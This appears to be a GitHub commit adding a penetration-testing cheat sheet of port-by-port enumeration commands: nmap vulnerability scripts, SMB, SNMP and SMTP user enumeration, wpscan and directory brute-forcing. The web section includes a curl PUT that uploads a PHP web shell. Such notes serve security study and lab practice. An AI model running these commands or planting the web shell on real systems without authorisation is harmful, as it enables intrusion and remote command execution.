This repository has been archived by the owner on Dec 15, 2023. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 2
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
1 changed file
with
196 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,196 @@ | ||
# Linux Common Port enumeration | ||
|
||
## Various initial Port Scans | ||
|
||
Syn-Stealth Scan | ||
``` | ||
nmap -sS $TARGETIP | ||
``` | ||
Scan all ports (slow) | ||
``` | ||
nmap -p- $TARGETIP | ||
``` | ||
Service version, run default scripts, OS thumbprinting. Usually run on individual ports for further info. | ||
``` | ||
nmap -sV -sC -O $TARGETIP -p $PORTNO | ||
``` | ||
UDP port Scans (nmap slow, unicorn scan very quick) | ||
``` | ||
nmap $TARGETIP -sU | ||
``` | ||
Quick aggressive scan on all ports using potentially noisy/unsafe scripts nmap | ||
``` | ||
$TARGETIP -p- -A -T4 -sC | ||
``` | ||
|
||
## Port 21 - FTP | ||
Test for FTP Banner, Version and anonymous login. Also checks for basic FTP known vulns | ||
``` | ||
nmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 $TARGETIP | ||
``` | ||
## Port 22 - SSH | ||
Usually unexploitable. Potential exploits for very old versions. Can often be exploited for username enumeration. Also sometimes just worth connecting to for custom SSH banners. Look for version exploits. Private Key Exploits or user enumeration exploits. | ||
|
||
## Port 25 - SMTP | ||
Connect to mail server. Dont use dns direct connect, verbose output | ||
``` | ||
nc -nvv $IP 25 | ||
HELO junk <cr><lf> | ||
``` | ||
|
||
Once connected if able to. use to vrfy domain/potential users | ||
``` | ||
telnet $IP 25 --> VRFY $USERNAME | ||
``` | ||
|
||
nmap scan to test for basic smtp exploits and attempt to enumerate users. | ||
``` | ||
nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 $IP | ||
``` | ||
|
||
## Port 69 - UDP - TFTP | ||
Used for tftp-server | ||
|
||
## Port 110 - Pop3 | ||
Usefull if you have mail/user credentials. Can be used to retrieve mail. Alternativly map to server with Evolution or other mail client. | ||
``` | ||
telnet $IP 110 | ||
USER user@$IP/DOMAIN | ||
PASS $PASSWORD | ||
or: | ||
USER $USERNAME | ||
PASS $PASSWORD | ||
# List all emails | ||
list | ||
# Retrieve email number 5, for example | ||
retr 5 | ||
``` | ||
|
||
## Port 111 - RPCbind | ||
Can sometimes disclose information regarding the machine | ||
``` | ||
rpcinfo -p $IP | ||
``` | ||
|
||
## Port 135 - MSRPC | ||
Check version number some versions are vulnerable | ||
|
||
## Port 143 - imap | ||
|
||
## Port 139/445 - SMB | ||
|
||
Nmap aggressive tests and vulnerability test. | ||
``` | ||
nmap --script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smbv2-enabled.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse,smbv2-enabled.nse $IP -p 445 | ||
``` | ||
enum4linux checks (unauthenticataed) | ||
``` | ||
enum4linux -a $IP | ||
``` | ||
rpc client and following commands authentication required | ||
``` | ||
rpcclient -U "$USERNAME" $IP | ||
srvinfo | ||
enumdomusers | ||
getdompwinfo | ||
querydominfo | ||
netshareenum | ||
netshareenumall | ||
smbclient -L $IP | ||
``` | ||
Possible SMB shares to try smbclient //$IP/tmp | ||
``` | ||
smbclient \\\$IP\\ipc$ -U $USERNAME | ||
smbclient //$IP/ipc$ -U $USERNAME | ||
``` | ||
## Port 161/162 UDP - SNMP | ||
aggressive snmp nmap test scan. | ||
``` | ||
nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes $IP | ||
``` | ||
snmp-check will carry out tests and spit info. Can customise the -c flag with any common community string or if known the used string for that domain/machine. Common ones are public, private, community. | ||
``` | ||
snmp-check -t $IP -c public | ||
``` | ||
## Port 554 - RTSP | ||
Check version number some versions are vulnerable | ||
|
||
## Port 1030/1032/1033/1038 | ||
Used by RPC to connect in a domain network | ||
|
||
## Port 1521 - Oracle Database | ||
Try and grab version header or remote connect. | ||
|
||
## Port 2049 - NFS | ||
Show the NFS mounts | ||
``` | ||
showmount -e $IP | ||
#mount | ||
mount $IP:/ /tmp/NFS or mount -t $IP:/ /tmp/NFS | ||
``` | ||
|
||
## Port 2100 - Oracle XML DB | ||
default passwords https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm | ||
|
||
## Port 3306 - MySQL | ||
Nmap aggressive script and vuln test | ||
``` | ||
nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse $IP -p 3306 | ||
``` | ||
|
||
## Port 3339 - Oracle Web ui | ||
|
||
## Port 80 - WEB | ||
Nikto vuln scan | ||
``` | ||
nikto -h http://$IP | ||
#with proxy | ||
nikto -h $TARGETIP -useproxy http://$LOCALIP:8080 | ||
``` | ||
WPS Scan | ||
``` | ||
WPScan (vp = Vulnerable Plugins, vt = Vulnerable Themes, u = Users) | ||
wpscan --url http://$IP | ||
wpscan --url http://$IP --enumerate vp | ||
wpscan --url http://$IP --enumerate vt | ||
wpscan --url http://$IP --enumerate u | ||
``` | ||
Joomscan | ||
``` | ||
joomscan -u http://$IP | ||
joomscan -u http://$IP --enumerate-components | ||
``` | ||
Curl | ||
``` | ||
# Get header | ||
curl -i $IP | ||
# Get all info | ||
curl -i -L $IP | ||
# check for title and links | ||
curl $IP -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//' | ||
# look at page text only | ||
curl $IP -s -L | html2text -width '99' | uniq | ||
# Check if it is possible to upload | ||
curl -v -X OPTIONS http://$IP/ | ||
curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>' http://$IP/test/shell.php | ||
``` | ||
Dirb | ||
``` | ||
# dirb bruteforce hidden directories | ||
dirb http://$IP | ||
``` | ||
Gobuster | ||
gobuser brute for directories (good list) also returns status code's. Customise -s flag with what codes you want to see e.g 403. | ||
``` | ||
gobuster -w /usr/share/wordlists/dirbuster/$DIRECTORYLIST -h http://$IP -s '200,204,301,302,307,403,500' -e | ||
``` | ||
|
||
## Port 443 - SSL | ||
Check for heartbleed vuln | ||
``` | ||
sslscan $IP:443 | ||
``` | ||
|
||
|
||
|
||
|